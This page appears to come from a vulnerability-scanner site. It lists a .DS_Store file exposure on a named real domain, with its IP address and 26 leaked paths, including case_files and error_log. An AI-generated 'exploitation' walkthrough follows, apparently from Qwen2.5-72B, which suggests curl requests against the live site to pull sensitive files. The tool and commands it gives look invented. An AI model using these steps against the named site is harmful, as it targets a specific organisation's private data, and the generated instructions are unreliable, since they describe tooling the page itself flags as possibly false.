Penne Tester MacOS file listing through .DS_Store file .DS_Storeā is an abbreviation for āDesktop Services Storeā. These files are created automatically by Apples āFinderā software (which is part of their OS). They store information about the files within a folder, including display options of folders, such as icon positions and view settings. It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels. IP: 142.165.148.140 Domain: sun-nurses.sk.ca Port: 443 URL: https://sun-nurses.sk.ca First seen 2021-08-05 13:56 Last seen 2024-02-03 00:15 Open for 911 days Severity: low Fingerprint: 5f32cf5d6962f09c87f05b7087f05b7080c85cb96bb485cc15c9ce2677bcc129 Found 26 files trough .DS_Store spidering: /.htaccess /.well-known /cgi-bin /error_log /favicon.ico /fivetest.php /index.php /migrate.php /ohcms /ohcms/.htaccess /ohcms/api /ohcms/case_files /ohcms/components /ohcms/fonts /ohcms/img /ohcms/index.html /ohcms/pdf /ohcms/scripts /ohcms/styles /ohcms/templates /ohcms/test /pdftest /res /robots.txt /sitemap.xml /tmp
To demonstrate the exploitation of the attack vector found within the input, we will use the provided .DS_Store file to extract file listings from the target domain.
First, we need to obtain the .DS_Store file. Since we have the list of files found through the .DS_Store spidering, we can assume that the file is accessible. In this case, the file is not directly provided, so we'll need to use a tool to extract the file from the server.
Install the
dsstoretoolpackage on your local machine. You can do this using Homebrew (assuming you have it installed):
brew install dsstoretool- Use the
dsstoretoolto extract the file listing from the .DS_Store file. In this case, the file is not provided, but let's assume we have access to it:
dsstoretool -r -i ./extracted_files.txt -f .DS_StoreThis command will recursively extract the file listing from the .DS_Store file and save it to the extracted_files.txt file.
- Now that we have the file listing, we can use it to gather information about the target domain. For example, we can look for sensitive files or directories that should not be publicly accessible.
Here's a sample output from the extracted_files.txt file:
.htaccess
.well-known
cgi-bin
error_log
favicon.ico
fivetest.php
index.php
migrate.php
ohcms
ohcms/.htaccess
ohcms/api
ohcms/case_files
ohcms/components
ohcms/fonts
ohcms/img
ohcms/index.html
ohcms/pdf
ohcms/scripts
ohcms/styles
ohcms/templates
ohcms/test
pdftest
res
robots.txt
sitemap.xml
tmpIn this example, we can see that there are several potentially sensitive files and directories, such as
error_log,migrate.php,ohcms/case_files, andohcms/pdf. These files and directories should be protected and not publicly accessible.To further exploit this attack vector, we could attempt to access these sensitive files and directories directly, either through the web server or by using a tool like
curlorwget. For example:
curl https://sun-nurses.sk.ca/error_logThis command would attempt to retrieve the contents of the error_log file from the target domain.
- Depending on the server configuration and the specific files and directories discovered, we might be able to access sensitive information or even execute code on the server.
In conclusion, the exploitation of the attack vector found within the input involves using the .DS_Store file to extract file listings from the target domain and then attempting to access sensitive files and directories directly. This can potentially lead to the exposure of sensitive information or the execution of malicious code on the server.
Model: Qwen/Qwen2.5-72B-Instruct Ā·
Generated content may be inaccurate
or false.